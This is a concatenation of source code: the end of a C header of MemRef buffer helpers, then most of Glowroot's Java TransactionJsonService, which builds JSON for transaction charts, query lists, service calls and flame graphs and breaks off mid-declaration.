o.ptr[pos]; } static void MemRef_AssertRange (MemRef o, size_t offset, size_t length) { ASSERT(offset 
<= o.len) ASSERT(length <= o.len - offset) } static MemRef MemRef_SubFrom (MemRef o, size_t offset) { ASSERT(o.ptr) ASSERT(offset <= o.len) return MemRef_Make(o.ptr + offset, o.len - offset); } static MemRef MemRef_SubTo (MemRef o, size_t length) { ASSERT(o.ptr) ASSERT(length <= o.len) return MemRef_Make(o.ptr, length); } static MemRef MemRef_Sub (MemRef o, size_t offset, size_t length) { ASSERT(o.ptr) MemRef_AssertRange(o, offset, length); return MemRef_Make(o.ptr + offset, length); } static char * MemRef_StrDup (MemRef o) { ASSERT(o.ptr) return b_strdup_bin(o.ptr, o.len); } static void MemRef_CopyOut (MemRef o, char *out) { ASSERT(o.ptr) ASSERT(out) memcpy(out, o.ptr, o.len); } static int MemRef_Equal (MemRef o, MemRef other) { ASSERT(o.ptr) ASSERT(other.ptr) return (o.len == other.len) && !memcmp(o.ptr, other.ptr, o.len); } static int MemRef_FindChar (MemRef o, char ch, size_t *out_index) { ASSERT(o.ptr) for (size_t i = 0; i < o.len; i++) { if (o.ptr[i] == ch) { if (out_index) { *out_index = i; } return 1; } } return 0; } #endif
1,994
1,018
/* * Copyright 2011-2019 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.glowroot.ui; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.List; import java.util.Map; import com.fasterxml.jackson.core.JsonGenerator; import com.fasterxml.jackson.databind.ObjectMapper; import com.google.common.base.Function; import com.google.common.collect.ImmutableList; import com.google.common.collect.Iterables; import com.google.common.collect.Lists; import com.google.common.collect.Maps; import com.google.common.collect.Ordering; import com.google.common.io.CharStreams; import com.google.common.primitives.Doubles; import org.checkerframework.checker.nullness.qual.Nullable; import org.immutables.value.Value; import org.glowroot.common.live.ImmutableAggregateQuery; import org.glowroot.common.live.ImmutableSummaryQuery; import org.glowroot.common.live.LiveAggregateRepository.AggregateQuery; import org.glowroot.common.live.LiveAggregateRepository.OverviewAggregate; import org.glowroot.common.live.LiveAggregateRepository.PercentileAggregate; import org.glowroot.common.live.LiveAggregateRepository.SummaryQuery; import org.glowroot.common.live.LiveAggregateRepository.ThroughputAggregate; import org.glowroot.common.model.ImmutableOverallSummary; import org.glowroot.common.model.LazyHistogram; import org.glowroot.common.model.MutableProfile; import org.glowroot.common.model.MutableQuery; import org.glowroot.common.model.MutableServiceCall; import org.glowroot.common.model.OverallSummaryCollector; import org.glowroot.common.model.OverallSummaryCollector.OverallSummary; import org.glowroot.common.model.ProfileCollector; import org.glowroot.common.model.QueryCollector; import org.glowroot.common.model.Result; import org.glowroot.common.model.ServiceCallCollector; import org.glowroot.common.model.TransactionNameSummaryCollector.SummarySortOrder; import org.glowroot.common.model.TransactionNameSummaryCollector.TransactionNameSummary; import org.glowroot.common.util.CaptureTimes; import org.glowroot.common.util.Clock; import org.glowroot.common.util.ObjectMappers; import org.glowroot.common2.repo.AggregateRepository; import org.glowroot.common2.repo.ConfigRepository; import org.glowroot.common2.repo.ConfigRepository.RollupConfig; import org.glowroot.common2.repo.Utils; import org.glowroot.common2.repo.util.RollupLevelService; import org.glowroot.common2.repo.util.RollupLevelService.DataKind; import org.glowroot.ui.AggregateMerging.MergedAggregate; import org.glowroot.ui.AggregateMerging.PercentileValue; import org.glowroot.wire.api.model.AggregateOuterClass.Aggregate; import org.glowroot.wire.api.model.ProfileOuterClass.Profile; import static com.google.common.base.Preconditions.checkNotNull; @JsonService class TransactionJsonService { private static final double NANOSECONDS_PER_MILLISECOND = 1000000.0; private static final ObjectMapper mapper = ObjectMappers.create(); private final TransactionCommonService transactionCommonService; 
private final TraceCommonService traceCommonService; private final AggregateRepository aggregateRepository; private final ConfigRepository configRepository; private final RollupLevelService rollupLevelService; private final Clock clock; TransactionJsonService(TransactionCommonService transactionCommonService, TraceCommonService traceCommonService, AggregateRepository aggregateRepository, ConfigRepository configRepository, RollupLevelService rollupLevelService, Clock clock) { this.transactionCommonService = transactionCommonService; this.traceCommonService = traceCommonService; this.aggregateRepository = aggregateRepository; this.configRepository = configRepository; this.rollupLevelService = rollupLevelService; this.clock = clock; } @GET(path = "/backend/transaction/average", permission = "agent:transaction:overview") String getOverview(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<OverviewAggregate> overviewAggregates = transactionCommonService.getOverviewAggregates(agentRollupId, query, autoRefresh); if (overviewAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); overviewAggregates = transactionCommonService.getOverviewAggregates(agentRollupId, query, autoRefresh); if (!overviewAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(overviewAggregates).captureTime())) { // this is probably data from before the requested time period overviewAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); List<DataSeries> dataSeriesList = getDataSeriesForTimerChart(request, overviewAggregates, dataPointIntervalMillis, liveCaptureTime); Map<Long, Long> transactionCounts = getTransactionCounts(overviewAggregates); // TODO more precise aggregate when from/to not on rollup grid List<OverviewAggregate> overviewAggregatesForMerging = Lists.newArrayList(); for (OverviewAggregate overviewAggregate : overviewAggregates) { long captureTime = overviewAggregate.captureTime(); if (captureTime > request.from() && captureTime <= request.to()) { overviewAggregatesForMerging.add(overviewAggregate); } } MergedAggregate mergedAggregate = AggregateMerging.getMergedAggregate(overviewAggregatesForMerging); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", dataSeriesList); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeObjectField("transactionCounts", transactionCounts); jg.writeObjectField("mergedAggregate", mergedAggregate); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/percentiles", permission = "agent:transaction:overview") String getPercentiles(@BindAgentRollupId String agentRollupId, @BindRequest TransactionPercentileRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<PercentileAggregate> percentileAggregates = transactionCommonService.getPercentileAggregates(agentRollupId, query, autoRefresh); if 
(percentileAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); percentileAggregates = transactionCommonService.getPercentileAggregates(agentRollupId, query, autoRefresh); if (!percentileAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(percentileAggregates).captureTime())) { // this is probably data from before the requested time period percentileAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); PercentileData percentileData = getDataSeriesForPercentileChart(request, percentileAggregates, request.percentile(), dataPointIntervalMillis, liveCaptureTime); Map<Long, Long> transactionCounts = getTransactionCounts2(percentileAggregates); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", percentileData.dataSeriesList()); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeObjectField("transactionCounts", transactionCounts); jg.writeObjectField("mergedAggregate", percentileData.mergedAggregate()); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/throughput", permission = "agent:transaction:overview") String getThroughput(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { AggregateQuery query = toChartQuery(request, DataKind.GENERAL); long liveCaptureTime = clock.currentTimeMillis(); List<ThroughputAggregate> throughputAggregates = transactionCommonService.getThroughputAggregates(agentRollupId, query, autoRefresh); if (throughputAggregates.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); throughputAggregates = transactionCommonService.getThroughputAggregates(agentRollupId, query, autoRefresh); if (!throughputAggregates.isEmpty() && ignoreFallBackData(query, Iterables.getLast(throughputAggregates).captureTime())) { // this is probably data from before the requested time period throughputAggregates = ImmutableList.of(); } } long dataPointIntervalMillis = configRepository.getRollupConfigs().get(query.rollupLevel()).intervalMillis(); List<DataSeries> dataSeriesList = getDataSeriesForThroughputChart(request, throughputAggregates, dataPointIntervalMillis, liveCaptureTime); // TODO more precise aggregate when from/to not on rollup grid long transactionCount = 0; for (ThroughputAggregate throughputAggregate : throughputAggregates) { long captureTime = throughputAggregate.captureTime(); if (captureTime > request.from() && captureTime <= request.to()) { transactionCount += throughputAggregate.transactionCount(); } } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("dataSeries", dataSeriesList); jg.writeNumberField("dataPointIntervalMillis", dataPointIntervalMillis); jg.writeNumberField("transactionCount", transactionCount); jg.writeNumberField("transactionsPerMin", 60000.0 * transactionCount / (request.to() - request.from())); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = 
"/backend/transaction/queries", permission = "agent:transaction:queries") String getQueries(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.QUERY); QueryCollector queryCollector = transactionCommonService.getMergedQueries(agentRollupId, query); List<MutableQuery> queries = queryCollector.getSortedAndTruncatedQueries(); if (queries.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); queryCollector = transactionCommonService.getMergedQueries(agentRollupId, query); queries = queryCollector.getSortedAndTruncatedQueries(); if (ignoreFallBackData(query, queryCollector.getLastCaptureTime())) { // this is probably data from before the requested time period queries = ImmutableList.of(); } } List<Query> queryList = Lists.newArrayList(); for (MutableQuery loopQuery : queries) { queryList.add(ImmutableQuery.builder() .queryType(loopQuery.getType()) .truncatedQueryText(loopQuery.getTruncatedText()) .fullQueryTextSha1(loopQuery.getFullTextSha1()) .totalDurationNanos(loopQuery.getTotalDurationNanos()) .executionCount(loopQuery.getExecutionCount()) .totalRows(loopQuery.hasTotalRows() ? loopQuery.getTotalRows() : null) .build()); } if (queryList.isEmpty() && aggregateRepository.shouldHaveQueries(agentRollupId, query)) { return "{\"overwritten\":true}"; } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeObject(queryList); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/full-query-text", permission = "agent:transaction:queries") String getQueryText(@BindAgentRollupId String agentRollupId, @BindRequest FullQueryTextRequest request) throws Exception { String fullQueryText = transactionCommonService.readFullQueryText(agentRollupId, request.fullTextSha1()); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); if (fullQueryText == null) { jg.writeBooleanField("expired", true); } else { jg.writeStringField("fullText", fullQueryText); } jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/service-calls", permission = "agent:transaction:serviceCalls") String getServiceCalls(@BindAgentRollupId String agentRollupId, @BindRequest TransactionDataRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.SERVICE_CALL); ServiceCallCollector serviceCallCollector = transactionCommonService.getMergedServiceCalls(agentRollupId, query); List<MutableServiceCall> serviceCalls = serviceCallCollector.getSortedAndTruncatedServiceCalls(); if (serviceCalls.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); serviceCallCollector = transactionCommonService.getMergedServiceCalls(agentRollupId, query); serviceCalls = serviceCallCollector.getSortedAndTruncatedServiceCalls(); if (ignoreFallBackData(query, serviceCallCollector.getLastCaptureTime())) { // this is probably data from before the requested time period serviceCalls = ImmutableList.of(); } } List<ServiceCall> serviceCallList = Lists.newArrayList(); for (MutableServiceCall loopServiceCall : serviceCalls) { 
serviceCallList.add(ImmutableServiceCall.builder() .type(loopServiceCall.getType()) .text(loopServiceCall.getText()) .totalDurationNanos(loopServiceCall.getTotalDurationNanos()) .executionCount(loopServiceCall.getExecutionCount()) .build()); } Collections.sort(serviceCallList, new Comparator<ServiceCall>() { @Override public int compare(ServiceCall left, ServiceCall right) { // sort descending return Doubles.compare(right.totalDurationNanos(), left.totalDurationNanos()); } }); if (serviceCallList.isEmpty() && aggregateRepository.shouldHaveServiceCalls(agentRollupId, query)) { return "{\"overwritten\":true}"; } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeObject(serviceCallList); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/profile", permission = "agent:transaction:threadProfile") String getProfile(@BindAgentRollupId String agentRollupId, @BindRequest TransactionProfileRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.PROFILE); ProfileCollector profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); MutableProfile profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } boolean hasUnfilteredMainThreadProfile; boolean hasUnfilteredAuxThreadProfile; if (request.auxiliary()) { hasUnfilteredMainThreadProfile = transactionCommonService.hasMainThreadProfile(agentRollupId, query); hasUnfilteredAuxThreadProfile = profile.getUnfilteredSampleCount() > 0; } else { if (profile.getUnfilteredSampleCount() == 0) { hasUnfilteredMainThreadProfile = false; // return and display aux profile instead profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, true, request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently // changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } hasUnfilteredAuxThreadProfile = profile.getUnfilteredSampleCount() > 0; } else { hasUnfilteredMainThreadProfile = true; hasUnfilteredAuxThreadProfile = transactionCommonService.hasAuxThreadProfile(agentRollupId, query); } } StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); 
jg.writeBooleanField("hasUnfilteredMainThreadProfile", hasUnfilteredMainThreadProfile); jg.writeBooleanField("hasUnfilteredAuxThreadProfile", hasUnfilteredAuxThreadProfile); if (profile.getUnfilteredSampleCount() == 0 && isProfileOverwritten(request, agentRollupId, query)) { jg.writeBooleanField("overwritten", true); } jg.writeFieldName("profile"); profile.writeJson(jg); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/summaries", permission = "agent:transaction:overview") String getSummaries(@BindAgentRollupId String agentRollupId, @BindRequest TransactionSummaryRequest request, @BindAutoRefresh boolean autoRefresh) throws Exception { SummaryQuery query = ImmutableSummaryQuery.builder() .transactionType(request.transactionType()) .from(request.from()) .to(request.to()) .rollupLevel(rollupLevelService.getRollupLevelForView(request.from(), request.to(), DataKind.GENERAL)) .build(); OverallSummaryCollector overallSummaryCollector = transactionCommonService.readOverallSummary(agentRollupId, query, autoRefresh); OverallSummary overallSummary = overallSummaryCollector.getOverallSummary(); if (overallSummary.transactionCount() == 0 && fallBackToLargestAggregate(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); overallSummaryCollector = transactionCommonService.readOverallSummary(agentRollupId, query, autoRefresh); overallSummary = overallSummaryCollector.getOverallSummary(); if (ignoreFallBackData(query, overallSummaryCollector.getLastCaptureTime())) { // this is probably data from before the requested time period overallSummary = ImmutableOverallSummary.builder() .totalDurationNanos(0) .transactionCount(0) .build(); } } Result<TransactionNameSummary> queryResult = transactionCommonService .readTransactionNameSummaries(agentRollupId, query, request.sortOrder(), request.limit(), autoRefresh); StringBuilder sb = new StringBuilder(); JsonGenerator jg = mapper.getFactory().createGenerator(CharStreams.asWriter(sb)); try { jg.writeStartObject(); jg.writeObjectField("overall", overallSummary); jg.writeObjectField("transactions", queryResult.records()); jg.writeBooleanField("moreAvailable", queryResult.moreAvailable()); jg.writeEndObject(); } finally { jg.close(); } return sb.toString(); } @GET(path = "/backend/transaction/flame-graph", permission = "agent:transaction:threadProfile") String getFlameGraph(@BindAgentRollupId String agentRollupId, @BindRequest FlameGraphRequest request) throws Exception { AggregateQuery query = toQuery(request, DataKind.PROFILE); ProfileCollector profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); MutableProfile profile = profileCollector.getProfile(); if (profile.isEmpty() && fallBackToLargestAggregates(query)) { // fall back to largest aggregates in case expiration settings have recently changed query = withLargestRollupLevel(query); profileCollector = transactionCommonService.getMergedProfile(agentRollupId, query, request.auxiliary(), request.include(), request.exclude(), request.truncateBranchPercentage()); profile = profileCollector.getProfile(); if (ignoreFallBackData(query, profileCollector.getLastCaptureTime())) { // this is probably data from before the requested time period profile = new MutableProfile(); } } return profile.toFlameGraphJson(); } @GET(path = "/backend/transaction/traces/flame-graph", 
permission = "agent:trace") String getTraceFlameGraph(@BindAgentId String agentId, @BindRequest TraceFlameGraphRequest request) throws Exception { Profile profile; if (request.auxiliary()) { profile = traceCommonService.getAuxThreadProfile(agentId, request.traceId(), request.checkLiveTraces()); } else { profile = traceCommonService.getMainThreadProfile(agentId, request.traceId(), request.checkLiveTraces()); } MutableProfile mutableProfile = new MutableProfile(); if (profile != null) { mutableProfile.merge(profile); } mutableProfile.truncateBranches(request.truncateBranchPercentage()); return mutableProfile.toFlameGraphJson(); } private AggregateQuery toChartQuery(RequestBase request, DataKind dataKind) throws Exception { int rollupLevel = rollupLevelService.getRollupLevelForView(request.from(), request.to(), dataKind); long rollupIntervalMillis = configRepository.getRollupConfigs().get(rollupLevel).intervalMillis(); // read the closest rollup to the left and right of chart, in order to display line sloping // correctly off the chart to the left and right long from = RollupLevelService.getFloorRollupTime(request.from(), rollupIntervalMillis); long to = RollupLevelService.getCeilRollupTime(request.to(), rollupIntervalMillis); return ImmutableAggregateQuery.builder() .transactionType(request.transactionType()) .transactionName(request.transactionName()) .from(from) .to(to) .rollupLevel(rollupLevel) .build(); } private AggregateQuery toQuery(RequestBase request, DataKind dataKind) throws Exception { return ImmutableAggregateQuery.builder() .transactionType(request.transactionType()) .transactionName(request.transactionName()) .from(request.from()) .to(request.to()) .rollupLevel(rollupLevelService.getRollupLevelForView(request.from(), request.to(), dataKind)) .build(); } private boolean fallBackToLargestAggregates(AggregateQuery query) { return query.rollupLevel() < getLargestRollupLevel() && query.from() < clock.currentTimeMillis() - getLargestRollupIntervalMillis() * 2; } private boolean fallBackToLargestAggregate(SummaryQuery query) { return query.rollupLevel() < getLargestRollupLevel() && query.from() < clock.currentTimeMillis() - getLargestRollupIntervalMillis() * 2; } private AggregateQuery withLargestRollupLevel(AggregateQuery query) { return ImmutableAggregateQuery.builder() .copyFrom(query) .rollupLevel(getLargestRollupLevel()) .build(); } private SummaryQuery withLargestRollupLevel(SummaryQuery query) { return ImmutableSummaryQuery.builder() .copyFrom(query) .rollupLevel(getLargestRollupLevel()) .build(); } private boolean ignoreFallBackData(AggregateQuery query, long lastCaptureTime) { return lastCaptureTime < query.from() + getLargestRollupIntervalMillis(); } private boolean ignoreFallBackData(SummaryQuery query, long lastCaptureTime) { return lastCaptureTime < query.from() + getLargestRollupIntervalMillis(); } private int getLargestRollupLevel() { return configRepository.getRollupConfigs().size() - 1; } private long getLargestRollupIntervalMillis() { List<RollupConfig> rollupConfigs = configRepository.getRollupConfigs(); return rollupConfigs.get(rollupConfigs.size() - 1).intervalMillis(); } private boolean isProfileOverwritten(TransactionProfileRequest request, String agentRollupId, AggregateQuery query) throws Exception { if (request.auxiliary() && aggregateRepository.shouldHaveAuxThreadProfile(agentRollupId, query)) { return true; } if (!request.auxiliary() && aggregateRepository.shouldHaveMainThreadProfile(agentRollupId, query)) { return true; } return false; } private static 
PercentileData getDataSeriesForPercentileChart( TransactionPercentileRequest request, List<PercentileAggregate> percentileAggregates, List<Double> percentiles, long dataPointIntervalMillis, long liveCaptureTime) { if (percentileAggregates.isEmpty()) { return ImmutablePercentileData.builder() .mergedAggregate(ImmutablePercentileMergedAggregate.builder() .transactionCount(0) .totalDurationNanos(0) .build()) .build(); } DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); List<DataSeries> dataSeriesList = Lists.newArrayList(); for (double percentile : percentiles) { dataSeriesList .add(new DataSeries(Utils.getPercentileWithSuffix(percentile) + " percentile")); } long transactionCount = 0; double totalDurationNanos = 0; LazyHistogram mergedHistogram = new LazyHistogram(); PercentileAggregate priorPercentileAggregate = null; for (PercentileAggregate percentileAggregate : percentileAggregates) { long captureTime = percentileAggregate.captureTime(); if (priorPercentileAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), captureTime, dataSeriesList, null); } else { dataSeriesHelper.addGapIfNeeded(priorPercentileAggregate.captureTime(), captureTime, dataSeriesList, null); } LazyHistogram durationNanosHistogram = new LazyHistogram(percentileAggregate.durationNanosHistogram()); for (int i = 0; i < percentiles.size(); i++) { DataSeries dataSeries = dataSeriesList.get(i); double percentile = percentiles.get(i); // convert to milliseconds dataSeries.add(captureTime, durationNanosHistogram.getValueAtPercentile(percentile) / NANOSECONDS_PER_MILLISECOND); } // TODO more precise aggregate when from/to not on rollup grid if (captureTime > request.from() && captureTime <= request.to()) { transactionCount += percentileAggregate.transactionCount(); totalDurationNanos += percentileAggregate.totalDurationNanos(); mergedHistogram.merge(durationNanosHistogram); } priorPercentileAggregate = percentileAggregate; } if (priorPercentileAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, null, priorPercentileAggregate.captureTime()); } List<PercentileValue> percentileValues = Lists.newArrayList(); for (double percentile : percentiles) { percentileValues.add(ImmutablePercentileValue.of( Utils.getPercentileWithSuffix(percentile) + " percentile", mergedHistogram.getValueAtPercentile(percentile))); } return ImmutablePercentileData.builder() .dataSeriesList(dataSeriesList) .mergedAggregate(ImmutablePercentileMergedAggregate.builder() .transactionCount(transactionCount) .totalDurationNanos(totalDurationNanos) .addAllPercentileValues(percentileValues) .build()) .build(); } private static List<DataSeries> getDataSeriesForThroughputChart(TransactionDataRequest request, List<ThroughputAggregate> throughputAggregates, long dataPointIntervalMillis, long liveCaptureTime) { if (throughputAggregates.isEmpty()) { return Lists.newArrayList(); } DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); DataSeries dataSeries = new DataSeries("throughput"); List<DataSeries> dataSeriesList = Lists.newArrayList(dataSeries); ThroughputAggregate priorThroughputAggregate = null; for (ThroughputAggregate throughputAggregate : throughputAggregates) { if (priorThroughputAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), throughputAggregate.captureTime(), dataSeriesList, null); } else { 
dataSeriesHelper.addGapIfNeeded(priorThroughputAggregate.captureTime(), throughputAggregate.captureTime(), dataSeriesList, null); } long from = throughputAggregate.captureTime() - dataPointIntervalMillis; // this math is to deal with live aggregate from = CaptureTimes.getRollup(from, dataPointIntervalMillis); double transactionsPerMin = 60000.0 * throughputAggregate.transactionCount() / (throughputAggregate.captureTime() - from); dataSeries.add(throughputAggregate.captureTime(), transactionsPerMin); priorThroughputAggregate = throughputAggregate; } if (priorThroughputAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, null, priorThroughputAggregate.captureTime()); } return dataSeriesList; } private static List<DataSeries> getDataSeriesForTimerChart(TransactionDataRequest request, List<OverviewAggregate> aggregates, long dataPointIntervalMillis, long liveCaptureTime) { if (aggregates.isEmpty()) { return Lists.newArrayList(); } List<StackedPoint> stackedPoints = Lists.newArrayList(); for (OverviewAggregate aggregate : aggregates) { stackedPoints.add(StackedPoint.create(aggregate)); } return getTimerDataSeries(request, stackedPoints, dataPointIntervalMillis, liveCaptureTime); } private static List<DataSeries> getTimerDataSeries(TransactionDataRequest request, List<StackedPoint> stackedPoints, long dataPointIntervalMillis, long liveCaptureTime) { DataSeriesHelper dataSeriesHelper = new DataSeriesHelper(liveCaptureTime, dataPointIntervalMillis); final int topX = 5; List<String> timerNames = getTopTimerNames(stackedPoints, topX + 1); List<DataSeries> dataSeriesList = Lists.newArrayList(); for (int i = 0; i < Math.min(timerNames.size(), topX); i++) { dataSeriesList.add(new DataSeries(timerNames.get(i))); } // need 'other' data series even if < topX timers in order to capture root timers, // e.g. 
time spent in 'servlet' timer but not in any nested timer DataSeries otherDataSeries = new DataSeries(null); OverviewAggregate priorOverviewAggregate = null; for (StackedPoint stackedPoint : stackedPoints) { OverviewAggregate overviewAggregate = stackedPoint.getOverviewAggregate(); if (priorOverviewAggregate == null) { // first aggregate dataSeriesHelper.addInitialUpslopeIfNeeded(request.from(), overviewAggregate.captureTime(), dataSeriesList, otherDataSeries); } else { dataSeriesHelper.addGapIfNeeded(priorOverviewAggregate.captureTime(), overviewAggregate.captureTime(), dataSeriesList, otherDataSeries); } MutableDoubleMap<String> stackedTimers = stackedPoint.getStackedTimers(); double totalOtherNanos = overviewAggregate.totalDurationNanos(); for (DataSeries dataSeries : dataSeriesList) { MutableDouble totalNanos = stackedTimers.get(dataSeries.getName()); if (totalNanos == null) { dataSeries.add(overviewAggregate.captureTime(), 0); } else { // convert to average milliseconds double value = (totalNanos.doubleValue() / overviewAggregate.transactionCount()) / NANOSECONDS_PER_MILLISECOND; dataSeries.add(overviewAggregate.captureTime(), value); totalOtherNanos -= totalNanos.doubleValue(); } } if (overviewAggregate.transactionCount() == 0) { otherDataSeries.add(overviewAggregate.captureTime(), 0); } else { // convert to average milliseconds otherDataSeries.add(overviewAggregate.captureTime(), (totalOtherNanos / overviewAggregate.transactionCount()) / NANOSECONDS_PER_MILLISECOND); } priorOverviewAggregate = overviewAggregate; } if (priorOverviewAggregate != null) { dataSeriesHelper.addFinalDownslopeIfNeeded(dataSeriesList, otherDataSeries, priorOverviewAggregate.captureTime()); } dataSeriesList.add(otherDataSeries); return dataSeriesList; } private static Map<Long, Long> getTransactionCounts( List<OverviewAggregate> overviewAggregates) { Map<Long, Long> transactionCounts = Maps.newHashMap(); for (OverviewAggregate overviewAggregate : overviewAggregates) { transactionCounts.put(overviewAggregate.captureTime(), overviewAggregate.transactionCount()); } return transactionCounts; } private static Map<Long, Long> getTransactionCounts2( List<PercentileAggregate> percentileAggregates) { Map<Long, Long> transactionCounts = Maps.newHashMap(); for (PercentileAggregate percentileAggregate : percentileAggregates) { transactionCounts.put(percentileAggregate.captureTime(), percentileAggregate.transactionCount()); } return transactionCounts; } // calculate top 5 timers private static List<String> getTopTimerNames(List<StackedPoint> stackedPoints, int topX) { MutableDoubleMap<String> timerTotals = new MutableDoubleMap<String>(); for (StackedPoint stackedPoint : stackedPoints) { for (Map.Entry<String, MutableDouble> entry : stackedPoint.getStackedTimers() .entrySet()) { timerTotals.add(entry.getKey(), entry.getValue().doubleValue()); } } Ordering<Map.Entry<String, MutableDouble>> valueOrdering = Ordering.natural() .onResultOf(new Function<Map.Entry<String, MutableDouble>, Double>() { @Override public Double apply( Map. 
/*@Nullable*/ Entry<String, MutableDouble> entry) { checkNotNull(entry); return entry.getValue().doubleValue(); } }); List<String> timerNames = Lists.newArrayList(); @SuppressWarnings("assignment.type.incompatible") List<Map.Entry<String, MutableDouble>> topTimerTotals = valueOrdering.greatestOf(timerTotals.entrySet(), topX); for (Map.Entry<String, MutableDouble> entry : topTimerTotals) { timerNames.add(entry.getKey()); } return timerNames; } private static class StackedPoint { private final OverviewAggregate overviewAggregate; // stacked timer values only include time spent as a leaf node in the timer tree private final MutableDoubleMap<String> stackedTimers; private static StackedPoint create(OverviewAggregate overviewAggregate) { MutableDoubleMap<String> stackedTimers = new MutableDoubleMap<String>(); for (Aggregate.Timer rootTimer : overviewAggregate.mainThreadRootTimers()) { // skip root timers for (Aggregate.Timer topLevelTimer : rootTimer.getChildTimerList()) { // traverse tree starting at top-level (under root) timers addToStackedTimer(topLevelTimer, stackedTimers); } } return new StackedPoint(overviewAggregate, stackedTimers); } private StackedPoint(OverviewAggregate overviewAggregate, MutableDoubleMap<String> stackedTimers) { this.overviewAggregate = overviewAggregate; this.stackedTimers = stackedTimers; } private OverviewAggregate getOverviewAggregate() { return overviewAggregate; } private MutableDoubleMap<String> getStackedTimers() { return stackedTimers; } private static void 